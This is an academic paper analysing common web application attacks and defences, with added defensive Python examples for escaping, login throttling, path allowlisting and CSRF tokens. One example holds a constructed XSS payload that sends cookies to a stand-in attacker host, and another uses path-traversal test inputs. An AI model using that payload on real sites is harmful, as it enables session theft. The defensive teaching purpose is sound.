Modern information technologies / 4. Information Security

Shcherbatenko V.M.1, Zakharova M.V.2, Liuta M.V.1

Kyiv National University of Technologies and Design1

Cherkasy State Technological University2, Ukraine

Analysis of dangerous attacks to increase the security of web applications on the Internet

Web application security is becoming one of the main problems in ensuring the security not only of websites but also of the many corporate applications that run over the Internet.

The aim of this work is to identify the main vulnerabilities of web applications, analyse the most dangerous attacks against them, and determine the best methods of protection for raising the security level of web applications.

Security is the most important criterion for the proper functioning of any web application, yet successful attacks are a frequent occurrence. To avoid a web application being compromised, all of its vulnerabilities need to be identified. One class of vulnerability lies in the web server software itself, that is, in server programs such as Apache or Microsoft Internet Information Server. This software is large and complex, so it inevitably contains security flaws.

Such flaws are often found not across an entire line of web servers but only in particular releases, which is why the exact version in use must be known and kept patched. The more widely deployed a piece of software is, the more attention attackers pay to it, and the more vulnerable it is in practice.

The analysis of attacks on web applications identified the following as the most dangerous (the percentages are the share of surveyed web resources affected by each attack):

The most common weakness is insufficient transport layer protection, which allows data to be intercepted in transit. It affects 70% of web resources. The countermeasure is to use the HTTPS protocol, and to use it for the whole application rather than only for the login page, with plain HTTP requests redirected to HTTPS.

Information leakage is the next type of attack, affecting 56% of resources. Information leakage occurs when the program fails or operates incorrectly and exposes internal details, for example in error messages. To exclude this possibility, the program must be tested continuously and the messages produced on the server side checked so that no internal information reaches the client.

Cross-site scripting (XSS) can be executed on 47% of resources. The attack injects JavaScript code that is then executed in the user's browser; attacks of this type are often referred to as HTML injection. The defence is to sanitise and validate the input data and, when user-supplied data is placed into a page, to escape it for the HTML context in which it appears.
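As an added illustration (not code from the original paper), the following Python snippet shows the reflected pattern beside its escaped form, together with a simple input-validation rule. The comment field, the PAYLOAD string and the evil.example host are constructed for the example.

```python
import html
import re

# Constructed attacker input for a comment field that the page reflects back to
# other visitors (the vulnerable pattern described above). evil.example is hypothetical.
PAYLOAD = '<script>new Image().src="http://evil.example/c?"+document.cookie</script>'


def render_comment_vulnerable(comment: str) -> str:
    """Concatenates user input straight into HTML: the browser runs the script."""
    return f"<p class=\"comment\">{comment}</p>"


def render_comment_escaped(comment: str) -> str:
    """Escapes <, >, &, \" and ' so the payload is displayed as text, not executed."""
    return f"<p class=\"comment\">{html.escape(comment, quote=True)}</p>"


def render_title_attribute(user_text: str) -> str:
    """Same rule inside an attribute value: quote=True also neutralises the quote
    characters an attacker would use to break out of the attribute."""
    return f"<a href=\"/profile\" title=\"{html.escape(user_text, quote=True)}\">profile</a>"


# Input validation in addition to output escaping: a comment only needs a small
# character set, so anything else is rejected before it is stored.
COMMENT_RE = re.compile(r"[\w\s.,!?'\-]{1,500}")


def validate_comment(comment: str) -> bool:
    return COMMENT_RE.fullmatch(comment) is not None


SCRIPT_TAG = re.compile(r"<\s*script", re.IGNORECASE)


def contains_script_tag(rendered_html: str) -> bool:
    """Crude detector used only to show the difference between the two renderers;
    it is not a substitute for escaping."""
    return SCRIPT_TAG.search(rendered_html) is not None


if __name__ == "__main__":
    print(render_comment_vulnerable(PAYLOAD))
    print(render_comment_escaped(PAYLOAD))
    print("validated:", validate_comment(PAYLOAD))
```

html.escape covers the HTML text and attribute contexts. Data placed into a URL, a script block or an event-handler attribute needs context-specific encoding instead, which is why the input is also validated against a strict character set rather than relying on escaping alone.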

Password guessing by generating a large number of login requests (brute force) can be carried out against 29% of resources. The defence is to enforce high-complexity passwords, configure the server to analyse incoming requests and throttle repeated attempts, and require a CAPTCHA after several incorrectly entered passwords.
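The three measures above, combined in one login path, as an added Python example that is not part of the original paper. The user record, the password policy thresholds and the MAX_FAILURES/WINDOW_SECONDS values are assumptions chosen for the illustration; a real deployment would also track failures per source address.

```python
import hashlib
import hmac
import os
import re
import time
from collections import defaultdict
from typing import Callable, Dict, List, Optional, Tuple

MAX_FAILURES = 5        # failed attempts before a CAPTCHA is demanded (assumed policy)
WINDOW_SECONDS = 600    # sliding window in which failures are counted (assumed policy)
PBKDF2_ROUNDS = 100_000


def password_is_strong(password: str) -> bool:
    """Minimum complexity policy: 12+ characters with upper, lower, digit and symbol."""
    return (len(password) >= 12
            and re.search(r"[A-Z]", password) is not None
            and re.search(r"[a-z]", password) is not None
            and re.search(r"\d", password) is not None
            and re.search(r"[^\w\s]", password) is not None)


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Salted PBKDF2, so that a leaked database is also slow to brute-force offline."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


class LoginGuard:
    """Counts recent failures per account; the clock is injectable for testing."""

    def __init__(self, clock: Callable[[], float] = time.monotonic) -> None:
        self._clock = clock
        self._failures: Dict[str, List[float]] = defaultdict(list)

    def _recent_failures(self, account: str) -> List[float]:
        now = self._clock()
        kept = [t for t in self._failures[account] if now - t < WINDOW_SECONDS]
        self._failures[account] = kept
        return kept

    def captcha_required(self, account: str) -> bool:
        return len(self._recent_failures(account)) >= MAX_FAILURES

    def record_failure(self, account: str) -> None:
        self._failures[account].append(self._clock())

    def record_success(self, account: str) -> None:
        self._failures.pop(account, None)


# Constructed user database: username -> (salt, PBKDF2 digest).
USERS: Dict[str, Tuple[bytes, bytes]] = {
    "alice": hash_password("Correct-Horse-Battery-9!"),
}
# Dummy record so that unknown usernames cost the same time as known ones.
_DUMMY_SALT, _DUMMY_DIGEST = hash_password(os.urandom(8).hex())


def attempt_login(guard: LoginGuard, username: str, password: str,
                  captcha_solved: bool = False) -> str:
    """Returns 'ok', 'denied' or 'captcha_required'."""
    if guard.captcha_required(username) and not captcha_solved:
        return "captcha_required"
    salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_DIGEST))
    _, candidate = hash_password(password, salt)
    if username in USERS and hmac.compare_digest(candidate, stored):
        guard.record_success(username)
        return "ok"
    guard.record_failure(username)
    return "denied"


if __name__ == "__main__":
    guard = LoginGuard()
    for guess in ["123456", "password", "qwerty", "letmein", "admin", "alice1"]:
        print(guess, "->", attempt_login(guard, "alice", guess))
```

The guard demands a CAPTCHA rather than locking the account outright, so an attacker cannot use the protection itself to deny the legitimate user access. The dummy hash for unknown usernames keeps the response time the same whether or not the account exists, which removes one way of enumerating valid logins.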

Content spoofing, the substitution of page content with attacker-supplied data, is possible on 26% of resources. Using this technique the attacker makes the user believe that the page was generated by the web server, when in fact its content has been supplied from an external source. To defend against this type of attack it is necessary to avoid building pages from frames and, most importantly, never to accept absolute or local file paths in request parameters.
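An added Python example, not from the original paper, of the parameter check the paragraph calls for: a page-include parameter is resolved only through an allowlist, and a URL parameter used for a frame or redirect is accepted only if it is internal. CONTENT_DIR, the page names and evil.example are assumptions for the illustration.

```python
import posixpath
from typing import Optional
from urllib.parse import urlparse

# Assumptions for the example: pages are included from this directory and the
# "page" parameter may only name one of the entries below.
CONTENT_DIR = "/var/www/app/content"
ALLOWED_PAGES = {"home", "news", "contact"}


def resolve_page(param: str) -> Optional[str]:
    """Maps ?page=<param> to a file path, or returns None for anything that is a
    URL, an absolute or local path, a traversal attempt, or not on the list."""
    parsed = urlparse(param)
    if parsed.scheme or parsed.netloc:          # http://..., //host/..., c:\...
        return None
    if param.startswith(("/", "\\")) or ":" in param or ".." in param:
        return None                             # absolute/local path or traversal
    if param not in ALLOWED_PAGES:              # the allowlist is the real control
        return None
    path = posixpath.normpath(posixpath.join(CONTENT_DIR, param + ".html"))
    if not path.startswith(CONTENT_DIR + "/"):  # defence in depth only
        return None
    return path


def is_internal_url(url: str) -> bool:
    """Accepts only a site-relative path for a frame src or redirect target.
    Rejects absolute URLs, protocol-relative //host URLs, backslash variants
    that browsers normalise to slashes, and javascript: or data: schemes."""
    parsed = urlparse(url)
    if parsed.scheme or parsed.netloc or "\\" in url:
        return False
    return url.startswith("/") and not url.startswith("//")


if __name__ == "__main__":
    for p in ["news", "http://evil.example/fake.html", "../../etc/passwd"]:
        print(repr(p), "->", resolve_page(p))
```

With the allowlist in place, an attacker cannot make the application fetch a page from evil.example or from the local file system; the path-prefix check is kept only so that a later mistake in the allowlist does not silently reopen the hole.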

Cross-site request forgery (CSRF), an attack on website visitors that exploits weaknesses of the HTTP protocol, can be executed on 24% of resources. The defence is to verify that a submitted form really originated from the application, for example by adding a unique, unpredictable token to each form and checking it on the server [2].
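The token defence, as an added Python example that is not part of the original paper. The session identifier, the /transfer form and SERVER_SECRET are assumptions for the illustration; the secret would be loaded from configuration in a real deployment.

```python
import hashlib
import hmac
import secrets
from typing import Dict

# Assumption: a per-deployment secret loaded from configuration, never from source.
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Token = nonce.HMAC(secret, session_id:nonce). Unguessable, and bound to the
    user's session, so a token the attacker obtains for their own session is useless."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)   # constant-time comparison


def render_transfer_form(session_id: str) -> str:
    """The token is embedded in the page; a page on another origin cannot read it."""
    return (
        '<form method="post" action="/transfer">'
        f'<input type="hidden" name="csrf_token" value="{issue_csrf_token(session_id)}">'
        '<input name="amount"><button>Send</button></form>'
    )


def handle_transfer(session_id: str, form: Dict[str, str]) -> int:
    """Returns an HTTP status. session_id comes from the cookie, which the browser
    attaches to a forged cross-site request as well; the token does not."""
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return 403
    return 200


if __name__ == "__main__":
    sid = "session-abc"                      # constructed session identifier
    print(render_transfer_form(sid))
    print("forged:", handle_transfer(sid, {"amount": "100"}))
```

Because the token is derived from the session identifier, it does not have to be stored server-side, and a token issued to the attacker's own session fails verification for the victim. Marking the session cookie SameSite is a complementary browser-side defence, not a replacement for the token check.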

One method of defending web applications and identifying their vulnerable areas is continuous security auditing. The main work carried out during a security audit of a web resource consists of: identifying vulnerabilities that allow unauthorised access to restricted areas of the web application; attempting to modify the information held by web services; testing whether arbitrary malicious code can be injected and executed; testing resistance to SQL injection and cross-site scripting (XSS); analysing script code; detecting vulnerabilities in the operating systems on which the web servers run; testing resilience to DoS/DDoS attacks; and reporting the vulnerabilities and risks found, together with recommendations for their elimination.


During an audit, experts analyse the web application, the operating system and the database. Both tool-based scanning and manual analysis are used; the latter greatly increases the quality of the work (Fig. 1).

Tool-based analysis means scanning the web resource with a vulnerability scanner and with other specialised applications such as Wapiti or Netsparker Community Edition.

Manual analysis is the second stage: the application is deployed on a dedicated server and experts test it by hand, applying every applicable method and attack. A detailed report is then produced on the application's resistance to each class of attack, including denial-of-service attacks [1].

Fig. 1. Methodology for auditing the security of web applications

Therefore, to defend against the most common types of attack it is necessary to validate input data properly, use the encrypted HTTPS protocol, and use a framework with built-in validation and encryption mechanisms. In addition, continuous security auditing and monitoring of web resources will ensure the reliability of the application and raise its level of protection.

References

1. Web resource security rating 2015. Information Security Company, 2015. Available at: http://itland.com.ua/services/penetration-service/web-application-penetration-testing/

2. Website Security Statistics Report 2015. WhiteHat Security, 2015. Available at: https://info.whitehatsec.com/Website-Stats-Report-2015.html

3. Scambray J., Shema M. Web Application Security: Ready Solutions. Moscow: Williams Publishing House, 2003. 384 pp.